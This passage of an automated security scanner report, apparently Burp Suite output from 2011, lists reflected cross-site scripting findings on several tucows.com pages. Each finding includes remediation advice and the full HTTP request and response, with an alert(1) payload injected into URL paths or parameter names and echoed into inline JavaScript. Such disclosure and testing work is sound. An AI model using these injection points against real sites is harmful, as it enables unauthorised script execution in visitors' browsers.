Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/about.html8f530"-alert(1)-"6001743e8c7";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.3. http://www.tucows.com/about.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf95a"-alert(1)-"9164bc1eed8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about.html?cf95a"-alert(1)-"9164bc1eed8=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 32110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/about.html?cf95a"-alert(1)-"9164bc1eed8=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.4. http://www.tucows.com/advertise.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5253"-alert(1)-"eb5b61b7f5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise.htmla5253"-alert(1)-"eb5b61b7f5a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/advertise.htmla5253"-alert(1)-"eb5b61b7f5a";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.5. http://www.tucows.com/advertise.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff349"-alert(1)-"f7b0a9fb104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise.html?ff349"-alert(1)-"f7b0a9fb104=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/advertise.html?ff349"-alert(1)-"f7b0a9fb104=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.6. http://www.tucows.com/affiliate/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5278d"-alert(1)-"005c7cc4526 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliate5278d"-alert(1)-"005c7cc4526/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/affiliate5278d"-alert(1)-"005c7cc4526/index.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.7. http://www.tucows.com/affiliate/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dd2c"-alert(1)-"15b6c2e9e37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliate/index.html5dd2c"-alert(1)-"15b6c2e9e37 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/affiliate/index.html5dd2c"-alert(1)-"15b6c2e9e37";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.8. http://www.tucows.com/affiliate/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91153"-alert(1)-"4395b206045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliate/index.html?91153"-alert(1)-"4395b206045=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/affiliate/index.html?91153"-alert(1)-"4395b206045=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.9. http://www.tucows.com/author_ratings.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffad2"-alert(1)-"0aea99c7693 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /author_ratings.htmlffad2"-alert(1)-"0aea99c7693 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/author_ratings.htmlffad2"-alert(1)-"0aea99c7693";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.10. http://www.tucows.com/author_ratings.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 509d3"-alert(1)-"fb9a5a72368 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /author_ratings.html?509d3"-alert(1)-"fb9a5a72368=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/author_ratings.html?509d3"-alert(1)-"fb9a5a72368=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.11. http://www.tucows.com/contact.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72c33"-alert(1)-"30d1cfe8a9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact.html72c33"-alert(1)-"30d1cfe8a9a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/contact.html72c33"-alert(1)-"30d1cfe8a9a";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.12. http://www.tucows.com/contact.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c10ba"-alert(1)-"8abc5e611cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact.html?c10ba"-alert(1)-"8abc5e611cd=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/contact.html?c10ba"-alert(1)-"8abc5e611cd=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.13. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39d2e"-alert(1)-"560230630e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images39d2e"-alert(1)-"560230630e8/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
